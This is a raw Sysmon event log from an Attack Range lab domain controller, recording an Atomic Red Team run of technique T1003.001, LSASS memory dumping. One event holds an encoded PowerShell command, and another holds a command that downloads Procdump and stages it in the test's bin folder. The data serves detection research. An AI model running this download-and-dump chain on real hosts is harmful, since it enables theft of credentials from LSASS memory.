15:52:48.418{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004329Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.418{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004328Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.418{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004327Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.418{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004326Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.418{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004325Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.418{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004324Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.418{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004323Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.418{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004322Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.418{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004321Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.418{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004320Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.418{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004319Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.418{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004318Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.423{D28789B6-7CD0-5FA1-D800-000000008801}2872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-WebRequest \""https://download.sysinternals.com/files/Procdump.zip\"" -OutFile \""$env:TEMP\Procdump.zip\"" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force New-Item -ItemType Directory (Split-Path C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe) -Force | Out-Null Copy-Item $env:TEMP\Procdump\Procdump.exe C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -Force} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004317Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.277{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD0-5FA1-D700-000000008801}3412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004316Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.277{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD0-5FA1-D700-000000008801}3412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004315Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.246{D28789B6-7CD0-5FA1-D700-000000008801}3412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hrtc5wki.vt1.ps12020-11-03 15:52:48.246 10341000x80000000000000004314Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.230{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CD0-5FA1-D700-000000008801}3412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004313Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.214{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD0-5FA1-D700-000000008801}3412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004312Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.214{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD0-5FA1-D700-000000008801}3412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004311Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.214{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004310Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.214{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004309Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.214{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004308Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.214{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 